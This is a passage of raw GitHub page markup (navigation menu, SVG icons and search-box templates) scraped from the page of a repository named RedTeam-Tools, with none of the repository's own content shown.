features </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"copilot_for_business","context":"enterprise","tag":"link","label":"copilot_for_business_link_enterprise_navbar"}" href="/features/copilot/copilot-business"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M23.922 16.992c-.861 1.495-5.859 5.023-11.922 5.023-6.063 0-11.061-3.528-11.922-5.023A.641.641 0 0 1 0 16.736v-2.869a.841.841 0 0 1 .053-.22c.372-.935 1.347-2.292 2.605-2.656.167-.429.414-1.055.644-1.517a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.499 1.132-3.368.397-.406.89-.717 1.474-.952 1.399-1.136 3.392-2.093 6.122-2.093 2.731 0 4.767.957 6.166 2.093.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086.23.462.477 1.088.644 1.517 1.258.364 2.233 1.721 2.605 2.656a.832.832 0 0 1 .053.22v2.869a.641.641 0 0 1-.078.256ZM12.172 11h-.344a4.323 4.323 0 0 1-.355.508C10.703 12.455 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a2.005 2.005 0 0 1-.085-.104L4 11.741v6.585c1.435.779 4.514 2.179 8 2.179 3.486 0 6.565-1.4 8-2.179v-6.585l-.098-.104s-.033.045-.085.104c-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.545-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.016.016Zm.641-2.935c.136 1.057.403 1.913.878 2.497.442.544 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.15.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.319-.862-2.824-1.025-1.487-.161-2.192.138-2.533.529-.269.307-.437.808-.438 1.578v.021c0 .265.021.562.063.893Zm-1.626 0c.042-.331.063-.628.063-.894v-.02c-.001-.77-.169-1.271-.438-1.578-.341-.391-1.046-.69-2.533-.529-1.505.163-2.347.537-2.824 1.025-.462.472-.705 1.179-.705 2.319 0 1.211.175 1.926.558 2.361.365.414 1.084.751 2.657.751 1.21 0 1.902-.394 2.344-.938.475-.584.742-1.44.878-2.497Z"></path><path d="M14.5 14.25a1 1 0 0 1 1 1v2a1 1 0 0 1-2 0v-2a1 1 0 0 1 1-1Zm-5 0a1 1 0 0 1 1 1v2a1 1 0 0 1-2 0v-2a1 1 0 0 1 1-1Z"></path> </svg> <div> <div class="color-fg-default h4">Copilot for business</div> Enterprise-grade AI features </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" data-analytics-event="{"location":"navbar","action":"premium_support","context":"enterprise","tag":"link","label":"premium_support_link_enterprise_navbar"}" href="/premium-support"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path> </svg> <div> <div class="color-fg-default h4">Premium Support</div> Enterprise-grade 24/7 support </div> </a></li> </ul> </div> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <a class="HeaderMenu-link no-underline px-0 px-lg-2 py-3 py-lg-2 d-block d-lg-inline-block" data-analytics-event="{"location":"navbar","action":"pricing","context":"global","tag":"link","label":"pricing_link_global_navbar"}" href="https://github.com/pricing">Pricing</a> </li> </ul> </nav> <div class="d-flex flex-column flex-lg-row width-full flex-justify-end flex-lg-items-center text-center mt-3 mt-lg-0 text-lg-left ml-lg-3"> <qbsearch-input class="search-input" data-scope="repo:A-poc/RedTeam-Tools" data-custom-scopes-path="/search/custom_scopes" data-delete-custom-scopes-csrf="HfXcBJoDaxVfhqdn45xFLds6p6oDvb76LOi6DtPWCUbp3jmVbEu2-YAZ4aQYM8AGMporxCbZRD5EZ04kNXBZvQ" data-max-custom-scopes="10" data-header-redesign-enabled="false" data-initial-value="" data-blackbird-suggestions-path="/search/suggestions" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" data-current-repository="A-poc/RedTeam-Tools" data-current-org="" data-current-owner="A-poc" data-logged-in="false" data-copilot-chat-enabled="false" data-nl-search-enabled="false" data-retain-scroll-position="true"> <div class="search-input-container search-with-dialog position-relative d-flex flex-row flex-items-center mr-4 rounded" data-action="click:qbsearch-input#searchInputContainerClicked" > <button type="button" class="header-search-button placeholder input-button form-control d-flex flex-1 flex-self-stretch flex-items-center no-wrap width-full py-0 pl-2 pr-0 text-left border-0 box-shadow-none" data-target="qbsearch-input.inputButton" aria-label="Search or jump to…" aria-haspopup="dialog" placeholder="Search or jump to..." data-hotkey=s,/ autocapitalize="off" data-analytics-event="{"location":"navbar","action":"searchbar","context":"global","tag":"input","label":"searchbar_input_global_navbar"}" data-action="click:qbsearch-input#handleExpand" > <div class="mr-2 color-fg-muted"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path> </svg> </div> <span class="flex-1" data-target="qbsearch-input.inputButtonText">Search or jump to...</span> <div class="d-flex" data-target="qbsearch-input.hotkeyIndicator"> <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> </div> </button> <input type="hidden" name="type" class="js-site-search-type-field"> <div class="Overlay--hidden " data-modal-dialog-overlay> <modal-dialog data-action="close:qbsearch-input#handleClose cancel:qbsearch-input#handleClose" data-target="qbsearch-input.searchSuggestionsDialog" role="dialog" id="search-suggestions-dialog" aria-modal="true" aria-labelledby="search-suggestions-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto"> <h1 id="search-suggestions-dialog-header" class="sr-only">Search code, repositories, users, issues, pull requests...</h1> <div class="Overlay-body Overlay-body--paddingNone"> <div data-view-component="true"> <div class="search-suggestions position-fixed width-full color-shadow-large border color-fg-default color-bg-default overflow-hidden d-flex flex-column query-builder-container" style="border-radius: 12px;" data-target="qbsearch-input.queryBuilderContainer" hidden > <!-- '"` --><!-- </textarea></xmp> --></option></form><form id="query-builder-test-form" action="" accept-charset="UTF-8" method="get"> <query-builder data-target="qbsearch-input.queryBuilder" id="query-builder-query-builder-test" data-filter-key=":" data-view-component="true" class="QueryBuilder search-query-builder"> <div class="FormControl FormControl--fullWidth"> <label id="query-builder-test-label" for="query-builder-test" class="FormControl-label sr-only"> Search </label> <div class="QueryBuilder-StyledInput width-fit " data-target="query-builder.styledInput" > <span id="query-builder-test-leadingvisual-wrap" class="FormControl-input-leadingVisualWrap QueryBuilder-leadingVisualWrap"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search FormControl-input-leadingVisual"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path> </svg> </span> <div data-target="query-builder.styledInputContainer" class="QueryBuilder-StyledInputContainer"> <div aria-hidden="true" class="QueryBuilder-StyledInputContent" data-target="query-builder.styledInputContent" ></div> <div class="QueryBuilder-InputWrapper"> <div aria-hidden="true" class="QueryBuilder-Sizer" data-target="query-builder.sizer"></div> <input id="query-builder-test" name="query-builder-test" value="" autocomplete="off" type="text" role="combobox" spellcheck="false" aria-expanded="false" aria-describedby="validation-77f461ac-c330-44a2-b211-22549c9c3559" data-target="query-builder.input" data-action=" input:query-builder#inputChange blur:query-builder#inputBlur keydown:query-builder#inputKeydown focus:query-builder#inputFocus " data-view-component="true" class="FormControl-input QueryBuilder-Input FormControl-medium" /> </div> </div> <span class="sr-only" id="query-builder-test-clear">Clear</span> <button role="button" id="query-builder-test-clear-button" aria-labelledby="query-builder-test-clear query-builder-test-label" data-target="query-builder.clearButton" data-action=" click:query-builder#clear focus:query-builder#clearButtonFocus blur:query-builder#clearButtonBlur " variant="small" hidden="hidden" type="button" data-view-component="true" class="Button Button--iconOnly Button--invisible Button--medium mr-1 px-2 py-0 d-flex flex-items-center rounded-1 color-fg-muted"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x-circle-fill Button-visual"> <path d="M2.343 13.657A8 8 0 1 1 13.658 2.343 8 8 0 0 1 2.343 13.657ZM6.03 4.97a.751.751 0 0 0-1.042.018.751.751 0 0 0-.018 1.042L6.94 8 4.97 9.97a.749.749 0 0 0 .326 1.275.749.749 0 0 0 .734-.215L8 9.06l1.97 1.97a.749.749 0 0 0 1.275-.326.749.749 0 0 0-.215-.734L9.06 8l1.97-1.97a.749.749 0 0 0-.326-1.275.749.749 0 0 0-.734.215L8 6.94Z"></path> </svg> </button> </div> <template id="search-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path> </svg> </template> <template id="code-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path> </svg> </template> <template id="file-code-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file-code"> <path d="M4 1.75C4 .784 4.784 0 5.75 0h5.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v8.586A1.75 1.75 0 0 1 14.25 15h-9a.75.75 0 0 1 0-1.5h9a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 10 4.25V1.5H5.75a.25.25 0 0 0-.25.25v2.5a.75.75 0 0 1-1.5 0Zm1.72 4.97a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734l1.47-1.47-1.47-1.47a.75.75 0 0 1 0-1.06ZM3.28 7.78 1.81 9.25l1.47 1.47a.751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018l-2-2a.75.75 0 0 1 0-1.06l2-2a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Zm8.22-6.218V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path> </svg> </template> <template id="history-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path> </svg> </template> <template id="repo-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path> </svg> </template> <template id="bookmark-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bookmark"> <path d="M3 2.75C3 1.784 3.784 1 4.75 1h6.5c.966 0 1.75.784 1.75 1.75v11.5a.75.75 0 0 1-1.227.579L8 11.722l-3.773 3.107A.751.751 0 0 1 3 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v9.91l3.023-2.489a.75.75 0 0 1 .954 0l3.023 2.49V2.75a.25.25 0 0 0-.25-.25Z"></path> </svg> </template> <template id="plus-circle-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-plus-circle"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm7.25-3.25v2.5h2.5a.75.75 0 0 1 0 1.5h-2.5v2.5a.75.75 0 0 1-1.5 0v-2.5h-2.5a.75.75 0 0 1 0-1.5h2.5v-2.5a.75.75 0 0 1 1.5 0Z"></path> </svg> </template> <template id="circle-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-dot-fill"> <path d="M8 4a4 4 0 1 1 0 8 4 4 0 0 1 0-8Z"></path> </svg> </template> <template id="trash-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path d="M11 1.75V3h2.25a.75.75 0 0 1 0 1.5H2.75a.75.75 0 0 1 0-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75ZM4.496 6.675l.66 6.6a.25.25 0 0 0 .249.225h5.19a.25.25 0 0 0 .249-.225l.66-6.6a.75.75 0 0 1 1.492.149l-.66 6.6A1.748 1.748 0 0 1 10.595 15h-5.19a1.75 1.75 0 0 1-1.741-1.575l-.66-6.6a.75.75 0 1 1 1.492-.15ZM6.5 1.75V3h3V1.75a.25.25 0 0 0-.25-.25h-2.5a.25.25 0 0 0-.25.25Z"></path> </svg> </template> <template id="team-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-people"> <path d="M2 5.5a3.5 3.5 0 1 1 5.898 2.549 5.508 5.508 0 0 1 3.034 4.084.75.75 0 1 1-1.482.235 4 4 0 0 0-7.9 0 .75.75 0 0 1-1.482-.236A5.507 5.507 0 0 1 3.102 8.05 3.493 3.493 0 0 1 2 5.5ZM11 4a3.001 3.001 0 0 1 2.22 5.018 5.01 5.01 0 0 1 2.56 3.012.749.749 0 0 1-.885.954.752.752 0 0 1-.549-.514 3.507 3.507 0 0 0-2.522-2.372.75.75 0 0 1-.574-.73v-.352a.75.75 0 0 1 .416-.672A1.5 1.5 0 0 0 11 5.5.75.75 0 0 1 11 4Zm-5.5-.5a2 2 0 1 0-.001 3.999A2 2 0 0 0 5.5 3.5Z"></path> </svg> </template> <template id="project-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path> </svg> </template> <template id="pencil-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path d="M11.013 1.427a1.75 1.75 0 0 1 2.474 0l1.086 1.086a1.75 1.75 0 0 1 0 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 0 1-.927-.928l.929-3.25c.081-.286.235-.547.445-.758l8.61-8.61Zm.176 4.823L9.75 4.81l-6.286 6.287a.253.253 0 0 0-.064.108l-.558 1.953 1.953-.558a.253.253 0 0 0 .108-.064Zm1.238-3.763a.25.25 0 0 0-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 0 0 0-.354Z"></path> </svg> </template> <template id="copilot-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copilot"> <path d="M7.998 15.035c-4.562 0-7.873-2.914-7.998-3.749V9.338c.085-.628.677-1.686 1.588-2.065.013-.07.024-.143.036-.218.029-.183.06-.384.126-.612-.201-.508-.254-1.084-.254-1.656 0-.87.128-1.769.693-2.484.579-.733 1.494-1.124 2.724-1.261 1.206-.134 2.262.034 2.944.765.05.053.096.108.139.165.044-.057.094-.112.143-.165.682-.731 1.738-.899 2.944-.765 1.23.137 2.145.528 2.724 1.261.566.715.693 1.614.693 2.484 0 .572-.053 1.148-.254 1.656.066.228.098.429.126.612.012.076.024.148.037.218.924.385 1.522 1.471 1.591 2.095v1.872c0 .766-3.351 3.795-8.002 3.795Zm0-1.485c2.28 0 4.584-1.11 5.002-1.433V7.862l-.023-.116c-.49.21-1.075.291-1.727.291-1.146 0-2.059-.327-2.71-.991A3.222 3.222 0 0 1 8 6.303a3.24 3.24 0 0 1-.544.743c-.65.664-1.563.991-2.71.991-.652 0-1.236-.081-1.727-.291l-.023.116v4.255c.419.323 2.722 1.433 5.002 1.433ZM6.762 2.83c-.193-.206-.637-.413-1.682-.297-1.019.113-1.479.404-1.713.7-.247.312-.369.789-.369 1.554 0 .793.129 1.171.308 1.371.162.181.519.379 1.442.379.853 0 1.339-.235 1.638-.54.315-.322.527-.827.617-1.553.117-.935-.037-1.395-.241-1.614Zm4.155-.297c-1.044-.116-1.488.091-1.681.297-.204.219-.359.679-.242 1.614.091.726.303 1.231.618 1.553.299.305.784.54 1.638.54.922 0 1.28-.198 1.442-.379.179-.2.308-.578.308-1.371 0-.765-.123-1.242-.37-1.554-.233-.296-.693-.587-1.713-.7Z"></path><path d="M6.25 9.037a.75.75 0 0 1 .75.75v1.501a.75.75 0 0 1-1.5 0V9.787a.75.75 0 0 1 .75-.75Zm4.25.75v1.501a.75.75 0 0 1-1.5 0V9.787a.75.75 0 0 1 1.5 0Z"></path> </svg> </template> <template id="copilot-error-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copilot-error"> <path d="M16 11.24c0 .112-.072.274-.21.467L13 9.688V7.862l-.023-.116c-.49.21-1.075.291-1.727.291-.198 0-.388-.009-.571-.029L6.833 5.226a4.01 4.01 0 0 0 .17-.782c.117-.935-.037-1.395-.241-1.614-.193-.206-.637-.413-1.682-.297-.683.076-1.115.231-1.395.415l-1.257-.91c.579-.564 1.413-.877 2.485-.996 1.206-.134 2.262.034 2.944.765.05.053.096.108.139.165.044-.057.094-.112.143-.165.682-.731 1.738-.899 2.944-.765 1.23.137 2.145.528 2.724 1.261.566.715.693 1.614.693 2.484 0 .572-.053 1.148-.254 1.656.066.228.098.429.126.612.012.076.024.148.037.218.924.385 1.522 1.471 1.591 2.095Zm-5.083-8.707c-1.044-.116-1.488.091-1.681.297-.204.219-.359.679-.242 1.614.091.726.303 1.231.618 1.553.299.305.784.54 1.638.54.922 0 1.28-.198 1.442-.379.179-.2.308-.578.308-1.371 0-.765-.123-1.242-.37-1.554-.233-.296-.693-.587-1.713-.7Zm2.511 11.074c-1.393.776-3.272 1.428-5.43 1.428-4.562 0-7.873-2.914-7.998-3.749V9.338c.085-.628.677-1.686 1.588-2.065.013-.07.024-.143.036-.218.029-.183.06-.384.126-.612-.18-.455-.241-.963-.252-1.475L.31 4.107A.747.747 0 0 1 0 3.509V3.49a.748.748 0 0 1 .625-.73c.156-.026.306.047.435.139l14.667 10.578a.592.592 0 0 1 .227.264.752.752 0 0 1 .046.249v.022a.75.75 0 0 1-1.19.596Zm-1.367-.991L5.635 7.964a5.128 5.128 0 0 1-.889.073c-.652 0-1.236-.081-1.727-.291l-.023.116v4.255c.419.323 2.722 1.433 5.002 1.433 1.539 0 3.089-.505 4.063-.934Z"></path> </svg> </template> <template id="workflow-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-workflow"> <path d="M0 1.75C0 .784.784 0 1.75 0h3.5C6.216 0 7 .784 7 1.75v3.5A1.75 1.75 0 0 1 5.25 7H4v4a1 1 0 0 0 1 1h4v-1.25C9 9.784 9.784 9 10.75 9h3.5c.966 0 1.75.784 1.75 1.75v3.5A1.75 1.75 0 0 1 14.25 16h-3.5A1.75 1.75 0 0 1 9 14.25v-.75H5A2.5 2.5 0 0 1 2.5 11V7h-.75A1.75 1.75 0 0 1 0 5.25Zm1.75-.25a.25.25 0 0 0-.25.25v3.5c0 .138.112.25.25.25h3.5a.25.25 0 0 0 .25-.25v-3.5a.25.25 0 0 0-.25-.25Zm9 9a.25.25 0 0 0-.25.25v3.5c0 .138.112.25.25.25h3.5a.25.25 0 0 0 .25-.25v-3.5a.25.25 0 0 0-.25-.25Z"></path> </svg> </template> <template id="book-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path> </svg> </template> <template id="code-review-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code-review"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v8.5A1.75 1.75 0 0 1 14.25 13H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 14.543V13H1.75A1.75 1.75 0 0 1 0 11.25v-8.5C0 1.784.784 1 1.75 1ZM1.5 2.75v8.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-8.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Zm5.28 1.72a.75.75 0 0 1 0 1.06L5.31 7l1.47 1.47a.751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018l-2-2a.75.75 0 0 1 0-1.06l2-2a.75.75 0 0 1 1.06 0Zm2.44 0a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L10.69 7 9.22 5.53a.75.75 0 0 1 0-1.06Z"></path> </svg> </template> <template id="codespaces-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-codespaces"> <path d="M0 11.25c0-.966.784-1.75 1.75-1.75h12.5c.966 0 1.75.784 1.75 1.75v3A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25Zm2-9.5C2 .784 2.784 0 3.75 0h8.5C13.216 0 14 .784 14 1.75v5a1.75 1.75 0 0 1-1.75 1.75h-8.5A1.75 1.75 0 0 1 2 6.75Zm1.75-.25a.25.25 0 0 0-.25.25v5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-5a.25.25 0 0 0-.25-.25Zm-2 9.5a.25.25 0 0 0-.25.25v3c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-3a.25.25 0 0 0-.25-.25Z"></path><path d="M7 12.75a.75.75 0 0 1 .75-.75h4.5a.75.75 0 0 1 0 1.5h-4.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path> </svg> </template> <template id="comment-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-comment"> <path d="M1 2.75C1 1.784 1.784 1 2.75 1h10.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 13.25 12H9.06l-2.573 2.573A1.458 1.458 0 0 1 4 13.543V12H2.75A1.75 1.75 0 0 1 1 10.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h4.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path> </svg> </template> <template id="comment-discussion-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-comment-discussion"> <path d="M1.75 1h8.5c.966 0 1.75.784 1.75 1.75v5.5A1.75 1.75 0 0 1 10.25 10H7.061l-2.574 2.573A1.458 1.458 0 0 1 2 11.543V10h-.25A1.75 1.75 0 0 1 0 8.25v-5.5C0 1.784.784 1 1.75 1ZM1.5 2.75v5.5c0 .138.112.25.25.25h1a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h3.5a.25.25 0 0 0 .25-.25v-5.5a.25.25 0 0 0-.25-.25h-8.5a.25.25 0 0 0-.25.25Zm13 2a.25.25 0 0 0-.25-.25h-.5a.75.75 0 0 1 0-1.5h.5c.966 0 1.75.784 1.75 1.75v5.5A1.75 1.75 0 0 1 14.25 12H14v1.543a1.458 1.458 0 0 1-2.487 1.03L9.22 12.28a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215l2.22 2.22v-2.19a.75.75 0 0 1 .75-.75h1a.25.25 0 0 0 .25-.25Z"></path> </svg> </template> <template id="organization-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-organization"> <path d="M1.75 16A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0h8.5C11.216 0 12 .784 12 1.75v12.5c0 .085-.006.168-.018.25h2.268a.25.25 0 0 0 .25-.25V8.285a.25.25 0 0 0-.111-.208l-1.055-.703a.749.749 0 1 1 .832-1.248l1.055.703c.487.325.779.871.779 1.456v5.965A1.75 1.75 0 0 1 14.25 16h-3.5a.766.766 0 0 1-.197-.026c-.099.017-.2.026-.303.026h-3a.75.75 0 0 1-.75-.75V14h-1v1.25a.75.75 0 0 1-.75.75Zm-.25-1.75c0 .138.112.25.25.25H4v-1.25a.75.75 0 